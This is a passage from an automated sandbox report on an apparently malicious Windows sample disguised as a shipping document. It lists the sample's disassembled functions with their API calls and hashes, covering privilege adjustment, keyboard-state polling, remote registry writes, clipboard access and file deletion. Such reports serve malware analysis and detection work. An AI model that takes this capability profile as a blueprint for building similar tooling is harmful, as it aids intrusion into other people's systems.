                                                                  • Part of subcall function 009881CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00988309), ref: 009881E0
                                                                  • Part of subcall function 009881CB: CloseHandle.KERNEL32(?,?,00988309), ref: 009881F2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                • String ID: $default$winsta0
                                                                • API String ID: 2063423040-1027155976
                                                                • Opcode ID: e48a4f6f737a4f7bf147fd4414118596123e473bf0f3004e74e8b31bd25b2a21
                                                                • Instruction ID: fdbd12920ab601d6ded2347535e4f647d389bf9a212c3bf97df78fee196d9dc8
                                                                • Opcode Fuzzy Hash: e48a4f6f737a4f7bf147fd4414118596123e473bf0f3004e74e8b31bd25b2a21
                                                                • Instruction Fuzzy Hash: 1B8169B1904209AFDF11EFA4DD49AEFBBBDEF04314F5441A9F910A6261DB318E15DB20
                                                                Function 0099C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0099C78D
                                                                • FindClose.KERNEL32(00000000), ref: 0099C7E1
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0099C806
                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0099C81D
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0099C844
                                                                • __swprintf.LIBCMT ref: 0099C890
                                                                • __swprintf.LIBCMT ref: 0099C8D3
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • __swprintf.LIBCMT ref: 0099C927
                                                                  • Part of subcall function 00953698: __woutput_l.LIBCMT ref: 009536F1
                                                                • __swprintf.LIBCMT ref: 0099C975
                                                                  • Part of subcall function 00953698: __flsbuf.LIBCMT ref: 00953713
                                                                  • Part of subcall function 00953698: __flsbuf.LIBCMT ref: 0095372B
                                                                • __swprintf.LIBCMT ref: 0099C9C4
                                                                • __swprintf.LIBCMT ref: 0099CA13
                                                                • __swprintf.LIBCMT ref: 0099CA62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                • API String ID: 3953360268-2428617273
                                                                • Opcode ID: a294e286842d201664af3b4a5f0cbcb56761a11fa71333fb2ccf557636b16d24
                                                                • Instruction ID: 4faeae17acc7a21176e9b6fb16f5da71574b10ac63d0e0c5dfff5e78b9d308a9
                                                                • Opcode Fuzzy Hash: a294e286842d201664af3b4a5f0cbcb56761a11fa71333fb2ccf557636b16d24
                                                                • Instruction Fuzzy Hash: BCA13DB2408304ABD710EFA5CD86EAFB7ECFFD8704F400919F59586191EA70DA08CB62
                                                                Function 0099EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099EFB6
                                                                • _wcscmp.LIBCMT ref: 0099EFCB
                                                                • _wcscmp.LIBCMT ref: 0099EFE2
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0099EFF4
                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 0099F00E
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0099F026
                                                                • FindClose.KERNEL32(00000000), ref: 0099F031
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0099F04D
                                                                • _wcscmp.LIBCMT ref: 0099F074
                                                                • _wcscmp.LIBCMT ref: 0099F08B
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099F09D
                                                                • SetCurrentDirectoryW.KERNEL32(009E8920), ref: 0099F0BB
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099F0C5
                                                                • FindClose.KERNEL32(00000000), ref: 0099F0D2
                                                                • FindClose.KERNEL32(00000000), ref: 0099F0E4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                • String ID: *.*
                                                                • API String ID: 1803514871-438819550
                                                                • Opcode ID: 7579e752b04ec4c13f8586a74cb1edbf1a2ba1d5a923cb9691a5b96d63ea8aa7
                                                                • Instruction ID: c263244175af10432ed6c74503030c1101352fea02b7bd2b78ef9052497ee3e0
                                                                • Opcode Fuzzy Hash: 7579e752b04ec4c13f8586a74cb1edbf1a2ba1d5a923cb9691a5b96d63ea8aa7
                                                                • Instruction Fuzzy Hash: 5631E3325042186BDF14DBB9EC68AEEB7AC9F88361F144276F814E2091EB70DE44DB61
                                                                Function 009B0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B0953
                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,009BF910,00000000,?,00000000,?,?), ref: 009B09C1
                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009B0A09
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 009B0A92
                                                                • RegCloseKey.ADVAPI32(?), ref: 009B0DB2
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B0DBF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                • API String ID: 536824911-966354055
                                                                • Opcode ID: 9e3a0334a913eb8d8a291add86589652c4d466dea8b2e092176e3731b31fc359
                                                                • Instruction ID: dbb9c598dbd55ece40e163167d3897ca99b3ac4bade713a1f1f79c675e0bbdf6
                                                                • Opcode Fuzzy Hash: 9e3a0334a913eb8d8a291add86589652c4d466dea8b2e092176e3731b31fc359
                                                                • Instruction Fuzzy Hash: F50226756046019FCB14EF18C995F6AB7E5BFC9324F048958F88A9B2A2CB70ED45CF81
                                                                Function 0099F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099F113
                                                                • _wcscmp.LIBCMT ref: 0099F128
                                                                • _wcscmp.LIBCMT ref: 0099F13F
                                                                  • Part of subcall function 00994385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009943A0
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0099F16E
                                                                • FindClose.KERNEL32(00000000), ref: 0099F179
                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0099F195
                                                                • _wcscmp.LIBCMT ref: 0099F1BC
                                                                • _wcscmp.LIBCMT ref: 0099F1D3
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099F1E5
                                                                • SetCurrentDirectoryW.KERNEL32(009E8920), ref: 0099F203
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099F20D
                                                                • FindClose.KERNEL32(00000000), ref: 0099F21A
                                                                • FindClose.KERNEL32(00000000), ref: 0099F22C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                • String ID: *.*
                                                                • API String ID: 1824444939-438819550
                                                                • Opcode ID: ef4f304cabe1581f37b976ecbdba859149bc8b9d529f35427c87475563481c40
                                                                • Instruction ID: 429cf7518e017c795b89389c58b39f90eff8bc580f11ddc306d1fe37078e56ab
                                                                • Opcode Fuzzy Hash: ef4f304cabe1581f37b976ecbdba859149bc8b9d529f35427c87475563481c40
                                                                • Instruction Fuzzy Hash: 1E31D5365042196ADF24DFA8EC69BEEB7AC9F85364F140271F814E2090DB30DE45DA64
                                                                Function 0099A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0099A20F
                                                                • __swprintf.LIBCMT ref: 0099A231
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0099A26E
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0099A293
                                                                • _memset.LIBCMT ref: 0099A2B2
                                                                • _wcsncpy.LIBCMT ref: 0099A2EE
                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0099A323
                                                                • CloseHandle.KERNEL32(00000000), ref: 0099A32E
                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0099A337
                                                                • CloseHandle.KERNEL32(00000000), ref: 0099A341
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                • String ID: :$\$\??\%s
                                                                • API String ID: 2733774712-3457252023
                                                                • Opcode ID: 9d352782e8dde5081853f8d05b8522bf28739b23d654d857660900b194ce29b4
                                                                • Instruction ID: 6f9c2b09f6ab6740d690e273189173e12718d823349ce8cdfbdde656f8b1c504
                                                                • Opcode Fuzzy Hash: 9d352782e8dde5081853f8d05b8522bf28739b23d654d857660900b194ce29b4
                                                                • Instruction Fuzzy Hash: E931BEB290410AABDF21DFA4DC4AFEB37BCEF89751F1041B6F908D2160EB7096448B65
                                                                Function 00987CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00988202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0098821E
                                                                  • Part of subcall function 00988202: GetLastError.KERNEL32(?,00987CE2,?,?,?), ref: 00988228
                                                                  • Part of subcall function 00988202: GetProcessHeap.KERNEL32(00000008,?,?,00987CE2,?,?,?), ref: 00988237
                                                                  • Part of subcall function 00988202: HeapAlloc.KERNEL32(00000000,?,00987CE2,?,?,?), ref: 0098823E
                                                                  • Part of subcall function 00988202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00988255
                                                                  • Part of subcall function 0098829F: GetProcessHeap.KERNEL32(00000008,00987CF8,00000000,00000000,?,00987CF8,?), ref: 009882AB
                                                                  • Part of subcall function 0098829F: HeapAlloc.KERNEL32(00000000,?,00987CF8,?), ref: 009882B2
                                                                  • Part of subcall function 0098829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00987CF8,?), ref: 009882C3
                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00987D13
                                                                • _memset.LIBCMT ref: 00987D28
                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00987D47
                                                                • GetLengthSid.ADVAPI32(?), ref: 00987D58
                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00987D95
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00987DB1
                                                                • GetLengthSid.ADVAPI32(?), ref: 00987DCE
                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00987DDD
                                                                • HeapAlloc.KERNEL32(00000000), ref: 00987DE4
                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00987E05
                                                                • CopySid.ADVAPI32(00000000), ref: 00987E0C
                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00987E3D
                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00987E63
                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00987E77
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                • String ID:
                                                                • API String ID: 3996160137-0
                                                                • Opcode ID: c2f715d42fba4f6c340e3599047ca61744da670cc5945665d6e462a8adad6d58
                                                                • Instruction ID: 60ace3383ccd371b724b92f2a38d22e707c8d860b88eac6956d4883ff87f0d71
                                                                • Opcode Fuzzy Hash: c2f715d42fba4f6c340e3599047ca61744da670cc5945665d6e462a8adad6d58
                                                                • Instruction Fuzzy Hash: 4E613B71904209AFDF00EFA4DC95AEEBB79FF48310F148269F915A62A1DB31DA05DB60
                                                                Function 009466E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                • API String ID: 0-4052911093
                                                                • Opcode ID: bca497869d7d0ef62c8b2f674be416c346548dbaec347ceaaa5c326ef55572cb
                                                                • Instruction ID: 28fa9cab968a6486df82516acccf80ff7523a28541ac58ff60b61e5b4d1886bb
                                                                • Opcode Fuzzy Hash: bca497869d7d0ef62c8b2f674be416c346548dbaec347ceaaa5c326ef55572cb
                                                                • Instruction Fuzzy Hash: B97283B1E04219DBDB24DF59C880BAEB7B9FF49310F14816AE945EB390E7349D81CB91
                                                                Function 0099001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardState.USER32(?), ref: 00990097
                                                                • SetKeyboardState.USER32(?), ref: 00990102
                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00990122
                                                                • GetKeyState.USER32(000000A0), ref: 00990139
                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00990168
                                                                • GetKeyState.USER32(000000A1), ref: 00990179
                                                                • GetAsyncKeyState.USER32(00000011), ref: 009901A5
                                                                • GetKeyState.USER32(00000011), ref: 009901B3
                                                                • GetAsyncKeyState.USER32(00000012), ref: 009901DC
                                                                • GetKeyState.USER32(00000012), ref: 009901EA
                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00990213
                                                                • GetKeyState.USER32(0000005B), ref: 00990221
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: State$Async$Keyboard
                                                                • String ID:
                                                                • API String ID: 541375521-0
                                                                • Opcode ID: 8d519c3f5025b48ec8b128982446eef152c6a38ae5ce073d60c120e4b0e6a6c6
                                                                • Instruction ID: 7bec47719674643c79a44cc94e04ec34a6d1a4f9236bf0d4b89618ebd2e8460d
                                                                • Opcode Fuzzy Hash: 8d519c3f5025b48ec8b128982446eef152c6a38ae5ce073d60c120e4b0e6a6c6
                                                                • Instruction Fuzzy Hash: CD51EB209087882DFF35DBA888557FABFBC9F81380F08459ED5D2571C2DAA49B8CC761
                                                                Function 009B03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 009B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009B04AC
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009B054B
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009B05E3
                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009B0822
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009B082F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1240663315-0
                                                                • Opcode ID: 648e89bc7495adec872ebc79749b4c26314fd86a85eb012e509249b11259f969
                                                                • Instruction ID: 5e00f573315573bc31ce8b4231526652ea7113d2092f433b7e91e2d08fe12a59
                                                                • Opcode Fuzzy Hash: 648e89bc7495adec872ebc79749b4c26314fd86a85eb012e509249b11259f969
                                                                • Instruction Fuzzy Hash: 4EE15D71604200AFCB14DF68C995E6BBBE9EFC9724F04896DF849DB261DA31E901CF91
                                                                Function 009A4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                • String ID:
                                                                • API String ID: 1737998785-0
                                                                • Opcode ID: 4136c5025d9f27fcc5a2e6a74b7179b2c8ae3c4ac6f47b8257d9f146a736d2b4
                                                                • Instruction ID: f9a41f6aacae975dfb76d68e80c360d7bbec9c6741b9443d5f6708bd8a6ea1a5
                                                                • Opcode Fuzzy Hash: 4136c5025d9f27fcc5a2e6a74b7179b2c8ae3c4ac6f47b8257d9f146a736d2b4
                                                                • Instruction Fuzzy Hash: 7021BC35204214DFDB00AF24ED19B6A7BA8FF95321F00812AFD469B2A1DBB0AC00DF84
                                                                Function 009937EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                  • Part of subcall function 00994A31: GetFileAttributesW.KERNEL32(?,0099370B), ref: 00994A32
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 009938A3
                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0099394B
                                                                • MoveFileW.KERNEL32(?,?), ref: 0099395E
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0099397B
                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099399D
                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 009939B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                • String ID: \*.*
                                                                • API String ID: 4002782344-1173974218
                                                                • Opcode ID: 29fe8287a2d91351dfc1f2dbd36ba460c4563c916deebf02bb7ad054d5e93641
                                                                • Instruction ID: 2b9bdc9778186528a68034d7f0f822af9bd479072d4ccd1c6729752f62fe8a9b
                                                                • Opcode Fuzzy Hash: 29fe8287a2d91351dfc1f2dbd36ba460c4563c916deebf02bb7ad054d5e93641
                                                                • Instruction Fuzzy Hash: 27518C3180514CEACF15EFA4CA92AFDB778AF54300F608169E406B7191EB316F09CF61
                                                                Function 0099F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0099F440
                                                                • Sleep.KERNEL32(0000000A), ref: 0099F470
                                                                • _wcscmp.LIBCMT ref: 0099F484
                                                                • _wcscmp.LIBCMT ref: 0099F49F
                                                                • FindNextFileW.KERNEL32(?,?), ref: 0099F53D
                                                                • FindClose.KERNEL32(00000000), ref: 0099F553
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
